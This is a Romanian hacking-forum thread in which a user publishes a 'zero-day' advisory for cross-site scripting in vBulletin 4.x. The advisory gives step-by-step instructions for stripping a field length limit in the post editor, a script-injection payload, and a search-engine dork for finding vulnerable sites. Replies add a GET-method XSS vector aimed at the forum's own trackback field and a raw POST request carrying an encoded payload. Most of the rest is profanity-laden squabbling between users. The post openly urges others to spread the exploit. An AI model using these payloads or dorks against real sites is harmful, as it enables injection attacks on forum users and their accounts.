Jump to content
sensi

[0-Day] vBulletin 4.2.x - Multiple Cross-Site-Scripting Vulnerabilities

By sensi, in Exploituri

Recommended Posts

sensi Newbie

sensi

Posted
Posted (edited)

Dupa mai multe mesaje primite, am decis sa public vulnerabilitatile gasite in vBulletin, poate unii o sa se bucure, altii nu. Acesta fiind primul meu exploit, sper sa va placa. Eu zic sa raspandim exploit-ul, facem putina reclama RST-ului. :)

##########################################################################################
#       -#-#- vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities -#-#-
#                              -#-#- RSTforums.com -#-#-
#                
#
# • Exploit Title: vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities - Reflected
# • Google Dork: "Powered by vBulletin® Version 4.x.x"
# • Date: 13.08.2013
# • Exploit Author: Sensi 
# • Website: RSTforums.com 
# • Software Link: http://vbulletin.com/ 
# • Version: vBulletin 4.x.x 
# • Tested on: Linux & Windows
# • Special thanks to: [URL="https://rstforums.com/forum/members/kalash1337/"]Kalash1337 [/URL]
# 
##########################################################################################
#
#                                 ### First XSS ###
# 
# Step 1: Go to -> Any post -> Press Editpost(advanced editor) -> Inspect 'title' element source and delete maxlength="85"
# (Direct Link:) [url]http://localhost/[/url][path]/editpost.php?p=[post number]&do=editpost
#
# Step 2: Add a malicious vector on title element. 
# (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script>
#
#________________________________________________________________________________________
#========================================================================================
#----------------------------------------------------------------------------------------
#
#                                  ### Second XSS ###
#
# Step 1: Go to -> Any thread -> Press post new reply(advanced editor) -> Inspect 'title' element source and delete maxlength="85"
# (Direct Link:) [url]http://localhost/[/url][path]/newreply.php?p=[post number]&noquote=1
#
# Step 2: Add a malicious vector on title element.
# (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script>
##########################################################################################
#
#
# Author will be not responsible for any damage caused! User assumes all responsibility.  
# 
#
##########################################################################################

Edited by sensi
  • Upvote 1
  • Active Members
akkiliON Collaborator

akkiliON

Posted
  • Active Members
Posted
Ala e in New Topic daca ai observat, daca e old, comunitatile in care am gasit trebuia sa-l fi reparat inainte sa raportez eu;)).

Cu un Self XSS nu ai ce face :)

Daca era exploatabil ar fi fost altceva.

Am vazut ca merg pe multe site-uri.

Anyway, good job.

kalash1337 Newbie

kalash1337

Posted
Posted
Nu inteleg de ce ai primit V.I.P pentru asa ceva. Ai furat munca altuia

Ai facut cont special, sa ii spui lui asta. De pe contul tau, nu ai avut curaj ?

Nu inteleg, ce te mananca pe tine ? (invidia, asta stiu sigur)

1337 Newbie

1337

Posted
Posted (edited)

Ma bucur ca baiatul a primit V.I.P.Nytro nu a vrut sa ia in considerare self-ul din chat, a spus ca e "inofensiv", daca ala e inofensiv asta cum e?

380711781.png

Edited by 1337
sensi Newbie

sensi

Posted
  • Author
Posted (edited)

Daca nu ma insel, unul dintre XSS-urile gasite de akkiliON, era cel din New Topic, deci ceva asemanator cu ce am gasit eu.

@Reckon, stai in banca ta, n-are rost sa incep cu tine. :-j

@1337, asta a fost alegerea lui Nytro, nu l-am obligat, sti vorba aia "Try again"...poate gasesti ceva. :)

Edited by sensi
  • Active Members
akkiliON Collaborator

akkiliON

Posted
  • Active Members
Posted (edited)
Daca nu ma insel, unul dintre XSS-urile gasite de akkiliON, era cel din New Topic, deci ceva asemanator cu ce am gasit eu.

@Reckon, stai in banca ta, n-are rost sa incep cu tine. :-j

@1337, asta a fost alegerea lui Nytro, nu l-am obligat, sti vorba aia "Try again"...poate gasesti ceva. :)

Era si ala si cel din trackback :)

Am primit VIP (cred) doar pe cel exploatabil din trackback. :)

Era POST Method dar l-am f?cut în GET Method.

Baft?.

// A?a era prin GET Method.

https://rstforums.com/forum/newthread.php?do=newthread&f=21&subject=1&message_backup=&sendtrackbacks=[vector]

Edited by akkiliON
sensi Newbie

sensi

Posted
  • Author
Posted

Reckon, am specificat in primul post, am primit niste mesaje prin care mi se cerea sa "dezvalui" locul, vectorul etc. Daca arunci o privire aici o sa vezi ca mi se cere asta, ba chiar se iau de mine (unii). Nici voi nu stiti ce vreti, acum inteleg de ce unii s-au retras de pe acest forum.

sensi Newbie

sensi

Posted
  • Author
Posted

Reckon, daca as fi in locul tau as tacea, macar eu nu f*t in gura adminii si moderatorii, a 2-a zi fac topic: "Va rog sa ma iertati", "Stau in pat plang, doar acum realizez cum m-am comportat cu voi, Tinky imi cer scuze", dupaia stergi topicurile, de ce nu le lasi ma, n-ai sange-n pl?. Baiete, cred ca esti bolnav, si da, joaca metin, se ruga de mine intr-o zi sa-i dau conturi metin. Daca tot am ajuns pana aici, de ce te-au "parasit" Dany, Stone, Silent, Florin sau care mai era? hai sa zic tot, nu ? Nu, n-are rost, desi o parte din ce am scris mai sus, se poate confirma. Stai jos, ai 3!

d33nis Newbie

d33nis

Posted
Posted

OFF: Ce va mai pricepeti sa aruncati cu rahat in topicul omului, plecati in pula mea la plimbare, nu va convine nu va uitat si nu mai comentati aiurea.

In loc sa ziceti multumesc ca a postat voi repede aruncati cu cacat in om.

ON: Bravo sensi, iti respect decizia de a publica asta. Succes in continuare.

  • Active Members
dancezar Newbie

dancezar

Posted
  • Active Members
Posted (edited)

Asta este cererea post

POST REQUEST


title=asdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhjasdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhjasdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhjasdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhj%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&
message_backup=gdfdfgghfghgfhgffg&message=gdfdfgghfghgfhgffg&wysiwyg=1
&iconid=0&
s=&[COLOR="#FF0000"]securitytoken=1378319885-ec2663c8b3a45b95824d484e8e4aea7be94f68d4[/COLOR]&do=postreply&t=1&p=&specifiedpost=0&posthash=2ebffc76043a2b2aaaba9e76de13b445&poststarttime=1378319752&loggedinuser=1&multiquoteempty=only&preview=Preview+Post&parseurl=1

Toate bune si frumoase dar cum ai sa furi securitoken a utilizatorului atacat (este complet random nu ai cum sa il ghicesti)?:)

//Fara el nu s-ar putea finaliza actiunea

//Concluzie frumoasa gaselita nu ca nu as respacta munca omului dar fara o modalitate de a fura tokenu este nefolositor

Edited by danyweb09
sensi Newbie

sensi

Posted
  • Author
Posted (edited)

Da, sa transformat datorita astora ca tine, daca si tu confirmi, asta cum plm mai ai tupeu sa comentezi, aa da, nu toti au caracter si respect fata de ceilalti, oamenii astia urasc cel mai mult, cine ma cunoaste stie asta.

@Matt, ai pus ceasu' sa sune la 7, sa faci iar spam cu stirile tale, pana si Diaconescu' e invidios pe tine.

Gata, am spus ce era de spus, m-am "descarcat". Incercati sa nu mai faceti off-topic...

@danyweb09, daca te uiti atent scrie EXEMPLU!

// N-am citit bine, scuze.

Edited by sensi
sensi Newbie

sensi

Posted
  • Author
Posted (edited)

@daatdraqq, da ai dreptate, mi-a zis Nytro ca vrea sa faca un tutorial (prin care obti ceva :-??, nu stiu sigur), dar nu stiu exact la ce sa referit. Poate ne da el mai multe detalii.

Cred ca se poate face si session puzzling, @mah_one, gresesc? Nu vreau sa dezinformez.

Edited by sensi
kalash1337 Newbie

kalash1337

Posted
Posted

@Matt, ai pus ceasu' sa sune la 7, sa faci iar spam cu stirile tale, pana si Diaconescu' e invidios pe tine.

Gata, am spus ce era de spus, m-am "descarcat". Incercati sa nu mai faceti off-topic...

Matt, Te-o facut ma !

dan_teodorescu_02_1c34ff7d0c.jpg

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...